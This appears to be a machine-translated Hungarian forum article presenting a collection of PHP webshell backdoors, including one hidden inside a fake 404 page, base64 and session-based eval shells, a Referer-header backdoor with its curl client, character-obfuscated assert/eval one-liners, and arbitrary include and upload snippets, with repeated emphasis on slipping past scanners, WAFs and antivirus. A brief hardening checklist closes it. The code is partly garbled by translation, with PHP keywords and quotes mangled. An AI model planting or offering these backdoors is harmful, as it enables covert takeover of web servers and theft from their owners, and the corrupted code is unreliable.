Ezeket a PHP backdoor programokat tanulási mentalitással kezeljük, és sok PHP backdoor kód lehetővé teszi, hogy lássuk, mennyire jó szándékúak a programozók.
Egy mondatban erős PHP hátsó ajtó
Ez a fajta hátsó ajtó lehetővé teszi a weboldalakat is,A szerveradminisztrátorok nagyon problémásak, gyakran kell módszert módosítaniuk különböző észlelések végrehajtásához, és sok új írási technikát nem lehet felfedezni és kezelni hagyományos detektálási módszerekkel.
Ma néhány érdekes PHP trójai sort fogunk felsorolni.
1. Rejtsd el a PHP pónik 404 oldalt:
[mw_shl_code=php,igaz] <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 nem talált</title> meg </head><body> <h1>Nem találták</h1> meg <p>A kért URL nem talált meg ezen a szerveren.</p> </body></html> <?php @preg_replace("/[pageerror]/e",$_POST['error'],"saft"); header('HTTP/1.1 404 Nem talált'); ?>[/mw_shl_code]
A 404-es oldal egy gyakran használt fájl a weboldalon, és kevesen ellenőrzik és módosítják, miután általánosan ajánlották, így ezzel el tudjuk rejteni a hátsó ajtót.
2. Jellemmentes, rejtett PHP egy mondatban:
[mw_shl_code=php,true]<?php session_start(); $_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']); $_SESSION['theCode']&&preg_replace('\'a\'eis','e'.' v’.‘ a’.‘ l’.‘ (base64_decode($_SESSION[\'theCode\']))','a'); ?>[/mw_shl_code]
Rendeld meg a $_POST['code'] hozzárendelést $_SESSION['theCode'], majd hajtsd végre a $_SESSION['theCode'], kiemelten az, hogy nincs aláíráskód.
Ha szkennelő eszközzel ellenőrized a kódot, az nem riaszt és eléri a célt.
3. Szuper lopakodó PHP hátsó ajtó:
[mw_shl_code=php,true]<?php $_GET[a]($_GET);?> [/mw_shl_code]
Önmagában a GET függvény alkot egy trójaiat;
Hogyan kell használni:
[mw_shl_code=php,igaz] ?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28P[/mw_shl_code]
A végrehajtás után a jelenlegi könyvtár c.php mondatot generál: Trojan, amikor az A paraméter értéklésben van, a Trójai generálás hiba meghibásodott, és ha állítás van, szintén hibát jelent, de egy Trójai falót generál, amit nem lehet alábecsülni.
Szintkérés, kód a PHP backdoor futtatásához:
Ez a módszer két fájlból van megvalósítva, az 1. fájl
[mw_shl_code=php,true]<?php
//1.php header('Tartalom-típus:text/html; charset=utf-8′); parse_str($_SERVER['HTTP_REFERER'], $a); if(reset($a) == '10'&& count($a) == 9) { eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
} ?>[/mw_shl_code]
2. dokumentum
[mw_shl_code=php,true]<?php
//2.php header('Tartalom-típus:text/html; charset=utf-8′);
//要执行的代码 $code= <<<KÓD phpinfo(); KÓD;
//进行base64编码 $code= base64_encode($code);
//构造referer字符串 $referer= "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//后门url $url= 'http://localhost/test1/1.php'; $ch= curl_init(); $options= tömb( CURLOPT_URL => $url, CURLOPT_HEADER => HAMIS, CURLOPT_RETURNTRANSFER => IGAZ, CURLOPT_REFERER => $referer ); curl_setopt_array($ch, $options); echocurl_exec($ch); ?>[/mw_shl_code]
Futtasd be a base64-re kódolt kódot a HTTP kérés HTTP_REFERER-én keresztül, hogy elérd a hátsó ajtó hatást.
Jó ezt az ötletet használni a WAF megkerülésére.
4.PHP hátsó ajtós generátor eszközt használd weevely
Weevely egy PHP-specifikusA Webshell ingyenes szoftver használható egy kapcsolati shell szimulálására, hasonlóan a telnetekhez, a Weevely-t általában webprogramok kihasználására, hátsó ajtók elrejtésére vagy telnet-szerű módszerekre használják a weboldali kezelés helyett, a Weevely által generált szerveroldali PHP kód base64 kódolt, így képes megtéveszteni a mainstream vírusirtó szoftvereket és IDS-eket, Miután feltöltöd a szerveroldali kódot, általában közvetlenül a Weevely-n keresztül futtathatod.
A backdoor függvényei általában stringfeldolgozó funkciók, és az olyan függvények, mint az értékelés és a rendszer, amelyek ellenőrzési szabályként szolgálnak, nem jelennek meg közvetlenül a kódban, így a backdoor fájl megkerülheti a backdoor keresőeszköz ellenőrzését. A sötét csoport webes hátsó ajtó kereső eszközével végzett szkennelés azt mutatja, hogy a fájl nincs fenyegetve.
A fentiek egy általános bevezető, és a releváns használati módszereket itt nem vezetik be, ez egy egyszerű tudományos népszerűsítés.
4. Három torzított, egymondatos PHP trójai Az első:
[mw_shl_code=php,true]<?php ($_=@$_GET[2]).@$_($_POST[1])?> [/mw_shl_code]
A második
[mw_shl_code=php,true]<?php $_=“”; $_[+“”]=”; $_=“$_”.“”; $_=($_[+“”]|“ ”). ($_[+“”]|“”). ($_[+“”]^“”); ?> <?php ${'_'.$_}['_'](${'_'.$_}['__']);?>[/mw_shl_code]
Írd http://site/2.php?_=assert&__=eval($_POST['pass']) jelszót a konyhakésbe, pass.
Ha a konyhakés további adatait használod, az rejtettebb, vagy használhatsz más befecskendező eszközöket, mert utólag beküldik.
A harmadik
[mw_shl_code=php,igaz] ($b 4dboy= $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').' ($b 4dboy)', 'add'); [/mw_shl_code]
str_rot13 ('riny') a kódolt értékelés, amely teljesen elkerüli a kulcsszavakat anélkül, hogy elveszítené a hatást, így az emberek vereséget hánynak!
5. Végül sorold fel néhány fejlett PHP Trójai hátsó ajtót:
1、
[mw_shl_code=php,true]$hh= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”; $hh("/[discuz]/e",$_POST['h'],"Access"); [/mw_shl_code]
//菜刀一句话
2、
[mw_shl_code=php,true]$filename=$_GET['xbid']; include($filename); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行
3、
[mw_shl_code=php,true]$reg="c"." o”.“ p”.“ y”; $reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]); [/mw_shl_code]
//重命名任何文件
4、
[mw_shl_code=php,true]$gzid= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”; $gzid("/[discuz]/e",$_POST['h'],"Access"); [/mw_shl_code]
//菜刀一句话
5、
[mw_shl_code=php,true]include($uid); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行,POST [mw_shl_code=php,true]www.xxx.com/index.php?uid=/home/www/bbs/image.gif [/mw_shl_code]
//gif插一句话
Összefoglalva, ezek a PHP hátsó ajtók teljesnek is nevezhetők, ha nem vigyázol, biztosan becsapnak, és mi a mai cikkünk legfontosabb prioritása? A kulcsfontosságú pontok az alábbi összefoglalóban találhatók!
Hogyan kezeljük a PHP egymondatos hátsó ajtót: Néhány kulcsfontosságú pontot hangsúlyozunk, és ha elolvasod ezt a cikket, úgy gondolom, nem vagy laikus, így nem fogok hosszú szavakkal beszélni:
- Figyelj a biztonságra PHP programok írásakor.
- A szervernaplófájlokat gyakran kell olvasni és biztonsági mentést készíteni
- Szigorú engedélykiosztás minden helyszínre
- Gyakori rendszeres biztonsági ellenőrzések dinamikus fájlokról és könyvtárakról
- Tanuld meg, hogyan végezd el a manuális vírusellenes eljárást, "Viselkedésalapú ítélet vizsgálata és gyilkosság"
- Maradjon velünk, vagy beépüljön egy aktív kiberbiztonsági táborba
- Még egy függvény is használható szabályként a szerverkörnyezet hierarchikus feldolgozásához
Úgy gondoljuk, hogy amikor több helyet kell kezelni és nagy mennyiségű adat van, akkor ésszerűen alkalmaznunk kell néhány segédeszközt, de nem szabad teljesen ezekre az eszközökre támaszkodni, a technológia folyamatosan frissül és fejlődik, a legfontosabb, hogy megtanuld és megértsd ezeknek a hatalmas hátsó ajtós embereknek a gondolkodását, és a szerepátruházás nagyobb előrelépést hozhat.
|